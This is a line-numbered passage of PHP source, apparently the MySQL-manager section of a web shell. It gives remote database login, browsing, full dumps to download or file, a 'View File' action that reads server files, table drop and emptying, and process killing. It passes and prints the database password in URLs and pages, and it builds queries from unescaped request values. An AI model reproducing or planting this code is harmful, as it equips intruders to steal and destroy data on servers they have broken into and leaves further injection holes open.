1110. $sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
1111. $sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
1112. $sqlquicklaunch[] = array("Logout",$surl."x=sql");
1113. echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
1114. if (count($sqlquicklaunch) > 0) {
1115.   foreach($sqlquicklaunch as $item) {
1116. echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1117.   }
1118.   }
1119.   }
1120. echo "</div>";
1121. echo "<center><table class='tab'><tr>";
1122.   if (!$sql_sock) {
1123.   echo  '<td>
1124. <form name="f_sql" action="'.$surl.'x=sql" method="POST">
1125. <input type="hidden" name="x" value="sql">
1126. <table class="tabnet" style="padding:1px;">
1127. <tr><th colspan="2"><b>MySQL Manager</b></th></tr>
1128. <tr><td>Host</td><td><input type="text" name="sql_server" class="inputz" style="width:249px;background:black" value="localhost"></td></tr>
1129. <tr><td>Username</td><td><input type="text" name="sql_login" class="inputz" value="" style="width:249px;background:black"></td></tr>
1130. <tr><td>Password</td><td><input type="password" name="sql_passwd" class="inputz" value="" style="width:249px;background:black;"></td></tr>
1131. <tr><td>Database</td><td><input type="text" name="sql_db" value="" class="inputz" style="width:249px;background:black"></td></tr>
1132. <tr><td>Port</td><td><input type="text" name="sql_port"  class="inputz" value="3306" style="background:black;" size="6"> <input type="submit" class="inputzbut" style=color:$color value="Connect"></td></tr>
1133. </table>
1134. </form>';
1135.   }
1136.   else {
1137.   echo  '<td valign="top" style="border:1px solid #333333;">
1138. <center>
1139. <a href="'.$sql_surl.'"><b style="color:#00ff00;">HOME</b></a>
1140. <hr size="1" noshade>';
1141.   $result = mysql_list_dbs($sql_sock);
1142.   if (!$result) { echo mysql_smarterror(); }
1143.   else {
1144.   echo  '<form action="'.$surl.'x=sql">
1145. <input type="hidden" name="x" value="sql">
1146. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1147. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1148. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1149. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1150. <select name="sql_db" onchange="this.form.submit()" style="width:100%;">';
1151. $c = 0;
1152. $dbs = "";
1153. while ($row = mysql_fetch_row($result)) {
1154.   $dbs .= "\t\t<option value=\"".$row[0]."\"";
1155.   if (@$sql_db == $row[0]) { $dbs .= " selected"; }
1156.   $dbs .= ">".$row[0]."</option>\n";
1157.   $c++;
1158. }
1159. echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
1160. echo $dbs;
1161.   }
1162. echo '</select>
1163. <hr size="1" noshade>
1164. </form>
1165. </center>';
1166. if (isset($sql_db)) {
1167.   $result = mysql_list_tables($sql_db);
1168.   if (!$result) {
1169. $result = mysql_list_dbs($sql_sock);
1170. $num = mysql_num_rows($result);
1171. for( $i = 0; $i < $num; $i++ ) {
1172. $dbname = mysql_dbname( $result, $i );
1173. echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\">$dbname</a></b></td></table>"; } }
1174.   else {
1175. echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br>\n";
1176. $c = 0;
1177. while ($row = mysql_fetch_array($result)) {
1178.   $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
1179.   $count_row = mysql_fetch_array($count);
1180.   echo "\t<b>+ <a style='color:#00ff00;' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
1181.   mysql_free_result($count);
1182.   $c++;
1183. }
1184. if (!$c) { echo "No tables found in database"; }
1185.   }
1186. }
1187. echo '</td>';
1188. echo '<td style="border:1px solid #333333;">';
1189. $diplay = TRUE;
1190. if (@$sql_db) {
1191.   if (!is_numeric($c)) { $c = 0; }
1192.   if ($c == 0) { $c = "no"; }
1193.   echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
1194.   if (count(@$dbquicklaunch) > 0) {
1195. foreach($dbsqlquicklaunch as $item) {
1196.   echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1197. }
1198.   }
1199.   echo "</b></center>\n";
1200.   $xs = array("","dump");
1201.   if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1202.   elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
1203.   elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
1204.   elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1205.   elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1206.   elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1207.   elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1208.   elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
1209.   elseif ($sql_tbl_x == "insert") {
1210. if ($sql_tbl_insert_radio == 1) {
1211.   $keys = "";
1212.   $akeys = array_keys($sql_tbl_insert);
1213.   foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1214.   if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1215.   $values = "";
1216.   $i = 0;
1217.   foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1218.   if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1219.   $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1220.   $sql_x = "query";
1221.   $sql_tbl_x = "browse";
1222. }
1223. elseif ($sql_tbl_insert_radio == 2) {
1224.   $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1225.   $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1226.   $result = mysql_query($sql_query) or print(mysql_smarterror());
1227.   $result = mysql_fetch_array($result, MYSQL_ASSOC);
1228.   $sql_x = "query";
1229.   $sql_tbl_x = "browse";
1230. }
1231.   }
1232.   if ($sql_x == "query") {
1233. echo "<hr size=\"1\" noshade>";
1234. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1235. if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
1236. if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
1237.   }
1238.   if (in_array($sql_x,$xs)) {
1239. echo '<table class="tab">
1240. <tr>
1241. <td style="border:1px solid #333333;padding:3px;">
1242. <b>Create new table:</b>
1243. <form action="'.$surl.'">
1244. <input type="hidden" name="x" value="sql">
1245. <input type="hidden" name="sql_x" value="newtbl">
1246. <input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1247. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1248. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1249. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1250. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1251. <input type="text" name="sql_newtbl" size="20">
1252. Fields: <input type="text" name="sql_field" size="3">
1253. <input class="inputzbut" type="submit" value="Create">
1254. </form>
1255. </td>
1256. <td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
1257. <form action="'.$surl.'">
1258. <input type="hidden" name="x" value="sql">
1259. <input type="hidden" name="sql_x" value="dump">
1260. <input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1261. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1262. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1263. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1264. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1265. <input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql">
1266. <input type="submit" class="inputzbut" name="submit" value="Dump">
1267. </form>
1268. </td>
1269. </tr>
1270. </table>';
1271. if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
1272. if ($sql_x == "newtbl") {
1273.   echo "<b>";
1274.   if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1275. echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1276.   }
1277.   else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
1278. }
1279. elseif ($sql_x == "dump") {
1280.   if (empty($submit)) {
1281. $diplay = FALSE;
1282. echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1283. echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1284. $v = join (";",$dmptbls);
1285. echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1286. if ($dump_file) {$tmp = $dump_file;}
1287. else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1288. echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1289. echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1290. echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1291. echo "<br><br><input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"Dump\">";
1292. echo "</form>";
1293.   }
1294.   else {
1295. $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0;
1296. $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array();
1297. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1298. $ret = mysql_dump($set);
1299. if ($sql_dump_download) {
1300.   @ob_clean();
1301.   header("Content-type: application/octet-stream");
1302.   header("Content-length: ".strlen($ret));
1303.   header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1304.   echo $ret;
1305.   exit;
1306. }
1307. elseif ($sql_dump_savetofile) {
1308.   $fp = fopen($sql_dump_file,"w");
1309.   if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1310.   else {
1311. fwrite($fp,$ret);
1312. fclose($fp);
1313. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1314.   }
1315. }
1316. else {echo "<b>Dump: nothing to do!</b>";}
1317.   }
1318. }
1319. if ($diplay) {
1320.   if (!empty($sql_tbl)) {
1321.   if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
1322.   $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1323.   $count_row = mysql_fetch_array($count);
1324.   mysql_free_result($count);
1325.   $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1326. $tbl_struct_fields = array();
1327. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1328.   if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
1329.   if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
1330.   if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
1331.   if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
1332.   $perpage = $sql_tbl_le - $sql_tbl_ls;
1333.   if (!is_numeric($perpage)) { $perpage = 10; }
1334.   $numpages = $count_row[0]/$perpage;
1335.   $e = explode(" ",$sql_order);
1336.   if (count($e) == 2) {
1337. if ($e[0] == "d") { $asc_desc = "DESC"; }
1338. else { $asc_desc = "ASC"; }
1339. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1340.   }
1341.   else {$v = "";}
1342.   $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1343.   $result = mysql_query($query) or print(mysql_smarterror());
1344.   echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1345.   echo "<hr size=\"1\" noshade>";
1346.   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> &nbsp; ";
1347.   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> &nbsp; ";
1348.   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";
1349.   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";
1350.   if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
1351.   if ($sql_tbl_x == "insert") {
1352. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1353. if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
1354. else {
1355.   echo "<br><br><b>Inserting row into table:</b><br>";
1356.   if (!empty($sql_tbl_insert_q)) {
1357. $sql_query = "SELECT * FROM `".$sql_tbl."`";
1358. $sql_query .= " WHERE".$sql_tbl_insert_q;
1359. $sql_query .= " LIMIT 1;";
1360. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1361. $values = mysql_fetch_assoc($result);
1362. mysql_free_result($result);
1363.   }
1364.   else {$values = array();}
1365.   echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
1366.   foreach ($tbl_struct_fields as $field) {
1367. $name = $field["Field"];
1368. if (empty($sql_tbl_insert_q)) {$v = "";}
1369. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1370. $i++;
1371.   }
1372.   echo "</table><br>";
1373.   echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1374.   if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1375.   echo "<br><br><input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form>";
1376. }
1377.   }
1378.   if ($sql_tbl_x == "browse") {
1379. $sql_tbl_ls = abs($sql_tbl_ls);
1380. $sql_tbl_le = abs($sql_tbl_le);
1381. echo "<hr size=\"1\" noshade>";
1382. echo "<b>Page: </b>";
1383. $b = 0;
1384. for($i=0;$i<$numpages;$i++) {
1385.   if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1386.   echo $i;
1387.   if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1388.   if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1389.   else { echo " "; }
1390. }
1391. if ($i == 0) {echo "empty";}
1392. echo "<br><br><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
1393. echo "<br><form method=\"POST\">\n";
1394. echo "<table class='tub'><tr>";
1395. echo "<th><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></th>";
1396. for ($i=0;$i<mysql_num_fields($result);$i++) {
1397.   $v = mysql_field_name($result,$i);
1398.   if ($e[0] == "a") {$s = "d"; $m = "asc";}
1399.   else {$s = "a"; $m = "desc";}
1400.   echo "<th>";
1401.   if (empty($e[0])) {$e[0] = "a";}
1402.   if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1403.   else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
1404.   echo "</th>";
1405. }
1406. echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
1407. echo "</tr>";
1408. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1409.   echo "<tr>";
1410.   $w = "";
1411.   $i = 0;
1412.   foreach ($row as $k=>$v) {
1413. $name = mysql_field_name($result,$i);
1414. $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
1415.   }
1416.   if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
1417.   echo "<td align='center' style='padding:0px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1418.   $i = 0;
1419.   foreach ($row as $k=>$v) {
1420. $v = htmlspecialchars($v);
1421. if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
1422. echo "<td>".$v."</td>";
1423. $i++;
1424.   }
1425.   echo "<td>";
1426.   echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
1427.   echo "&nbsp;|&nbsp;";
1428.   echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
1429.   echo "</td>";
1430.   echo "</tr>";
1431. }
1432. mysql_free_result($result);
1433. echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\"/> <select name=\"sql_x\">";
1434. echo "<option value=\"\">With selected:</option>";
1435. echo "<option value=\"deleterow\">Delete</option>";
1436. echo "</select> <input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form></p>";
1437. }
1438.  }
1439.  else {
1440. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1441. if (!$result) { echo mysql_smarterror(); }
1442. else {
1443. echo '<form method="POST">
1444. <table class="tub">
1445. <tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
1446.  $i = 0;
1447.  $tsize = $trows = 0;
1448.  while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1449. $tsize += $row["Data_length"];
1450. $trows += $row["Rows"];
1451. $size = view_size($row["Data_length"]);
1452. echo'<tr>
1453. <td align="center" style="padding:0px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'"></td>
1454. <td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'"><b>'.$row["Name"].'</b></a></td>
1455. <td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
1456. <td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
1457. </tr>';
1458. $i++;
1459.  }
1460.  echo "\t\t<tr>\n".
1461. "\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
1462. echo'</tr>
1463. </table>
1464. <div align="right">
1465. <select class="inputz" name="sql_x">
1466. <option value="">With selected:</option>
1467. <option value="tbldrop">Drop</option>
1468. <option value="tblempty">Empty</option>";
1469. <option value="tbldump">Dump</option>";
1470. <option value="tblcheck">Check table</option>";
1471. <option value="tbloptimize">Optimize table</option>";
1472. <option value="tblrepair">Repair table</option>";
1473. <option value="tblanalyze">Analyze table</option>";
1474. </select>
1475. <input class="inputzbut" type="submit" value="Confirm">
1476. </div>
1477. </form>';
1478.  mysql_free_result($result);
1479. }
1480.  }
1481. }
1482.  }
1483. }
1484. else {
1485. $xs = array("","newdb","serverstatus","servervars","processes","getfile");
1486. if (in_array($sql_x,$xs)) {
1487. echo '<table class="tab">
1488. <tr>
1489. <td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
1490. <form action="'.$surl.'">
1491. <input type="hidden" name="x" value="sql">
1492. <input type="hidden" name="sql_x" value="newdb">
1493. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1494. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1495. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1496. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1497. <input class="inputz" type="text" name="sql_newdb" size="20">
1498. <input class="inputzbut"  type="submit" value="Create">
1499. </form>
1500. </td>
1501. <td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
1502. <form action="'.$surl.'">
1503. <input type="hidden" name="x" value="sql">
1504. <input type="hidden" name="sql_x" value="getfile">
1505. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1506. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1507. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1508. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1509. <input class="inputz" type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'">
1510. <input class="inputzbut" type="submit" value="Get">
1511. </form>
1512. </td>
1513. </tr>
1514. </table>';
1515. }
1516. if (!empty($sql_x)) {
1517.  echo "<hr size=\"1\" noshade>";
1518.  if ($sql_x == "newdb") {
1519. echo "<b>";
1520. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1521. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1522.  }
1523.  if ($sql_x == "serverstatus") {
1524. $result = mysql_query("SHOW STATUS", $sql_sock);
1525. echo "<center><b>Server status variables:</b><br><br>";
1526. echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1527. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1528. echo "</table></center>";
1529. mysql_free_result($result);
1530.  }
1531.  if ($sql_x == "servervars") {
1532. $result = mysql_query("SHOW VARIABLES", $sql_sock);
1533. echo "<center><b>Server variables:</b><br><br>";
1534. echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1535. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1536. echo "</table>";
1537. mysql_free_result($result);
1538.  }
1539.  if ($sql_x == "processes") {
1540. if (!empty($kill)) {
1541.  $query = "KILL ".$kill.";";
1542.  $result = mysql_query($query, $sql_sock);
1543.  echo "<b>Process #".$kill." was killed.</b>";
1544. }
1545. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1546. echo "<center><b>Processes:</b><br><br>";
1547. echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
